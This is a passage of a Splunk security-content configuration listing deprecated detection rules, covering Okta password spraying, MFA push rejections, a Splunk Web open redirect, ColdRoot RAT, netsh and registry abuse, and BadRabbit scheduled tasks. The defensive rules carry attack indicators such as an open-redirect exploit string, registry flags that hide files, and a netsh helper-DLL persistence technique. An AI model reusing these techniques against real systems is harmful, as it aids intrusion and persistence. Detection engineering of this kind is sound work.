search is specific to Okta and requires Okta logs to be ingested in your Splunk deployment. action.escu.known_false_positives = Fidelity of this is high as it is Okta ThreatInsight. Filter and modify as needed. action.escu.creation_date = 2023-03-09 action.escu.modification_date = 2023-03-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta ThreatInsight Suspected PasswordSpray Attack - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity"] action.risk = 1 action.risk.param._risk_message = Okta ThreatInsight has detected or prevented a PasswordSpray attack. action.risk.param._risk = [{"risk_object_field": "outcome.reason", "risk_object_type": "other", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta ThreatInsight Suspected PasswordSpray Attack - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity"], "cis20": ["CIS 10"], "confidence": 100, "impact": 60, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078", "T1078.001", "T1110.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta ThreatInsight Threat Detected`. The following analytic utilizes Oktas ThreatInsight to identify "PasswordSpray" and any included secondary outcome reasons. This event will trigger when a brute force attempt occurs with unknown usernames attempted. action.notable.param.rule_title = Okta ThreatInsight Suspected PasswordSpray Attack action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` eventType="security.threat.detected" AND outcome.reason="Password Spray" | stats count min(_time) as firstTime max(_time) as lastTime values(displayMessage) by eventType client.userAgent.rawUserAgent client.userAgent.browser outcome.reason | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `okta_threatinsight_suspected_passwordspray_attack_filter` [ESCU - Okta Two or More Rejected Okta Pushes - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Failed MFA Requests For User`. The following analytic identifies an account that has rejected more than 2 Push notifications in a 10 minute window. Modify this query for your environment by upping the count or time window. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Failed MFA Requests For User`. The following analytic identifies an account that has rejected more than 2 Push notifications in a 10 minute window. Modify this query for your environment by upping the count or time window. action.escu.how_to_implement = This analytic is specific to Okta and requires Okta logs to be ingested. action.escu.known_false_positives = False positives may be present. Tune Okta and tune the analytic to ensure proper fidelity. Modify risk score as needed. Drop to anomaly until tuning is complete. action.escu.creation_date = 2022-09-27 action.escu.modification_date = 2022-09-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Okta Two or More Rejected Okta Pushes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Okta"] action.escu.analytic_story = ["Suspicious Okta Activity", "Okta MFA Exhaustion"] action.risk = 1 action.risk.param._risk_message = $user$ account has rejected multiple Okta pushes. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Okta Two or More Rejected Okta Pushes - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Okta Activity", "Okta MFA Exhaustion"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = **DEPRECATION NOTE** - This search has been deprecated and replaced with `Okta Multiple Failed MFA Requests For User`. The following analytic identifies an account that has rejected more than 2 Push notifications in a 10 minute window. Modify this query for your environment by upping the count or time window. action.notable.param.rule_title = Okta Two or More Rejected Okta Pushes action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `okta` outcome.reason="User rejected Okta push verify" OR (debugContext.debugData.factor="OKTA_VERIFY_PUSH" outcome.result=FAILURE legacyEventType="core.user.factor.attempt_fail" "target{}.detailEntry.methodTypeUsed"="Get a push notification") | bin _time as bin_time span=10m | eval user=coalesce(actor.alternateId,user), user=mvindex(split(user, "@"), 0), event_time = _time | stats earliest(event_time) as event_time, min(_time) as firsttime max(_time) as lasttime values(client.ipAddress) as client.ipAddress, values(outcome.reason) as outcome, values(src_ip) AS src_ip, values(client.userAgent.rawUserAgent) as user_agent, values(eventType) as eventType, values(outcome.result) as action, values(legacyEventType) as legacyEventType values(index) as idx, values(sourcetype) as st count by bin_time user host | rename bin_time as timeWindow | convert ctime(*timeWindow) ctime(firsttime) ctime(lasttime) | where count >= 2 | `okta_two_or_more_rejected_okta_pushes_filter` [ESCU - Open Redirect in Splunk Web - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search allows you to look for evidence of exploitation for CVE-2016-4859, the Splunk Open Redirect Vulnerability. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search allows you to look for evidence of exploitation for CVE-2016-4859, the Splunk Open Redirect Vulnerability. action.escu.how_to_implement = No extra steps needed to implement this search. action.escu.known_false_positives = None identified action.escu.creation_date = 2017-09-19 action.escu.modification_date = 2017-09-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Open Redirect in Splunk Web - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Open Redirect in Splunk Web - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 13"], "confidence": 50, "cve": ["CVE-2016-4859"], "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search allows you to look for evidence of exploitation for CVE-2016-4859, the Splunk Open Redirect Vulnerability. action.notable.param.rule_title = Open Redirect in Splunk Web action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = index=_internal sourcetype=splunk_web_access return_to="/%09/*" | `open_redirect_in_splunk_web_filter` [ESCU - Osquery pack - ColdRoot detection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for ColdRoot events from the osx-attacks osquery pack. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for ColdRoot events from the osx-attacks osquery pack. action.escu.how_to_implement = In order to properly run this search, Splunk needs to ingest data from your osquery deployed agents with the [osx-attacks.conf](https://github.com/facebook/osquery/blob/experimental/packs/osx-attacks.conf#L599) pack enabled. Also the [TA-OSquery](https://github.com/d1vious/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the osquery data populate the Alerts data model action.escu.known_false_positives = There are no known false positives. action.escu.creation_date = 2019-01-29 action.escu.modification_date = 2019-01-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Osquery pack - ColdRoot detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["ColdRoot MacOS RAT"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Osquery pack - ColdRoot detection - Rule action.correlationsearch.annotations = {"analytic_story": ["ColdRoot MacOS RAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for ColdRoot events from the osx-attacks osquery pack. action.notable.param.rule_title = Osquery pack - ColdRoot detection action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | from datamodel Alerts.Alerts | search app=osquery:results (name=pack_osx-attacks_OSX_ColdRoot_RAT_Launchd OR name=pack_osx-attacks_OSX_ColdRoot_RAT_Files) | rename columns.path as path | bucket _time span=30s | stats count(path) by _time, host, user, path | `osquery_pack___coldroot_detection_filter` [ESCU - Processes created by netsh - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes launching netsh.exe to execute various commands via the netsh command-line utility. Netsh.exe is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper .dll when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe that are executing commands via the command line. Deprecated because we have another detection of the same type. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for processes launching netsh.exe to execute various commands via the netsh command-line utility. Netsh.exe is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper .dll when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe that are executing commands via the command line. Deprecated because we have another detection of the same type. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = It is unusual for netsh.exe to have any child processes in most environments. It makes sense to investigate the child process and verify whether the process spawned is legitimate. We explicitely exclude "C:\Program Files\rempl\sedlauncher.exe" process path since it is a legitimate process by Mircosoft. action.escu.creation_date = 2020-11-23 action.escu.modification_date = 2020-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Processes created by netsh - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Netsh Abuse"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Processes created by netsh - Rule action.correlationsearch.annotations = {"analytic_story": ["Netsh Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for processes launching netsh.exe to execute various commands via the netsh command-line utility. Netsh.exe is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper .dll when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe that are executing commands via the command line. Deprecated because we have another detection of the same type. action.notable.param.rule_title = Processes created by netsh action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=netsh.exe by Processes.user Processes.dest Processes.parent_process Processes.parent_process_name Processes.process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `processes_created_by_netsh_filter` [ESCU - Prohibited Software On Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for applications on the endpoint that you have marked as prohibited. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for applications on the endpoint that you have marked as prohibited. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified action.escu.creation_date = 2019-10-11 action.escu.modification_date = 2019-10-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Prohibited Software On Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Monitor for Unauthorized Software", "Emotet Malware DHS Report TA18-201A", "SamSam Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Prohibited Software On Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["Monitor for Unauthorized Software", "Emotet Malware DHS Report TA18-201A", "SamSam Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.user Processes.process_name | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `prohibited_processes` | `prohibited_software_on_endpoint_filter` [ESCU - Reg exe used to hide files directories via registry keys - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search looks for command-line arguments used to hide a file or directory using the reg add command. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The search looks for command-line arguments used to hide a file or directory using the reg add command. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None at the moment action.escu.creation_date = 2019-02-27 action.escu.modification_date = 2019-02-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Reg exe used to hide files directories via registry keys - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Reg exe used to hide files directories via registry keys - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1564.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for command-line arguments used to hide a file or directory using the reg add command. action.notable.param.rule_title = Reg exe used to hide files directories via registry keys action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = reg.exe Processes.process="*add*" Processes.process="*Hidden*" Processes.process="*REG_DWORD*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user| `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)`| regex process = "(/d\s+2)" | `reg_exe_used_to_hide_files_directories_via_registry_keys_filter` [ESCU - Remote Registry Key modifications - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search monitors for remote modifications to registry keys. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search monitors for remote modifications to registry keys. action.escu.how_to_implement = To successfully implement this search, you must populate the `Endpoint` data model. This is typically populated via endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report reads and writes to the registry. Deprecated because I don't think the logic is right. action.escu.known_false_positives = This technique may be legitimately used by administrators to modify remote registries, so it's important to filter these events out. action.escu.creation_date = 2020-03-02 action.escu.modification_date = 2020-03-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Registry Key modifications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Remote Registry Key modifications - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Suspicious Windows Registry Activities", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search monitors for remote modifications to registry keys. action.notable.param.rule_title = Remote Registry Key modifications action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Registry.registry_key_name) as registry_key_name values(Registry.registry_path) as registry_path min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_path="\\\\*" by Registry.dest , Registry.user | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name(Registry)` | `remote_registry_key_modifications_filter` [ESCU - Scheduled tasks used in BadRabbit ransomware - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search looks for flags passed to schtasks.exe on the command-line that indicate that task names related to the execution of Bad Rabbit ransomware were created or deleted. Deprecated because we already have a similar detection action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for flags passed to schtasks.exe on the command-line that indicate that task names related to the execution of Bad Rabbit ransomware were created or deleted. Deprecated because we already have a similar detection action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = No known false positives action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Scheduled tasks used in BadRabbit ransomware - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Scheduled tasks used in BadRabbit ransomware - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for flags passed to schtasks.exe on the command-line that indicate that task names related to the execution of Bad Rabbit ransomware were created or deleted. Deprecated because we already have a similar detection action.notable.param.rule_title = Scheduled tasks used in BadRabbit ransomware action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process) as process from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe (Processes.process= "*create*" OR Processes.process= "*delete*") by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)`|`security_content_ctime(lastTime)` | search (process=*rhaegal* OR process=*drogon* OR *viserion_*) | `scheduled_tasks_used_in_badrabbit_ransomware_filter` [ESCU - Spectre and Meltdown Vulnerable Systems - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. The search is used to detect systems that are still vulnerable to the Spectre and Meltdown vulnerabilities. action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = ["Vulnerabilities"] action.escu.eli5 = The search is used to detect systems that are still vulnerable to the Spectre and Meltdown vulnerabilities. action.escu.how_to_implement = The search requires that you are ingesting your vulnerability-scanner data and that it reports the CVE of the vulnerability identified. action.escu.known_false_positives = It is possible that your vulnerability scanner is not detecting that the patches have been applied. action.escu.creation_date = 2017-01-07 action.escu.modification_date = 2017-01-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Spectre and Meltdown Vulnerable Systems - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Spectre And Meltdown Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Spectre and Meltdown Vulnerable Systems - Rule action.correlationsearch.annotations = {"analytic_story": ["Spectre And Meltdown Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2017-5753"], "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search is used to detect systems that are still vulnerable to the Spectre and Meltdown vulnerabilities. action.notable.param.rule_title = Spectre and Meltdown Vulnerable Systems action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Vulnerabilities where Vulnerabilities.cve ="CVE-2017-5753" OR Vulnerabilities.cve ="CVE-2017-5715" OR Vulnerabilities.cve ="CVE-2017-5754" by Vulnerabilities.dest | `drop_dm_object_name(Vulnerabilities)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `spectre_and_meltdown_vulnerable_systems_filter` [ESCU - Splunk Enterprise Information Disclosure - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection has been marked **DEPRECATED** by the Splunk Threat Research Team. This means that it will no longer be maintained or supported. If you have any questions feel free to email us at: research@splunk.com. This search allows you to look for evidence of exploitation for CVE-2018-11409, a Splunk Enterprise Information Disclosure Bug. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search allows you to look for evidence of exploitation for CVE-2018-11409, a Splunk Enterprise Information Disclosure Bug. action.escu.how_to_implement = The REST endpoint that exposes system information is also necessary for the proper operation of Splunk clustering and instrumentation. Whitelisting your Splunk systems will reduce false positives. action.escu.known_false_positives = Retrieving server information may be a legitimate API request. Verify that the attempt is a valid request for information. action.escu.creation_date = 2018-06-14 action.escu.modification_date = 2018-06-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Splunk Enterprise Information Disclosure - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Splunk Vulnerabilities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "field", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deprecated - Splunk Enterprise Information Disclosure - Rule action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 13"], "confidence": 50, "cve": ["CVE-2018-11409"], "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search allows you to look for evidence of exploitation for CVE-2018-11409, a Splunk Enterprise Information Disclosure Bug. action.notable.param.rule_title = Splunk Enterprise Information Disclosure action.notable.param.security_domain = network action.notable.param.severity = high 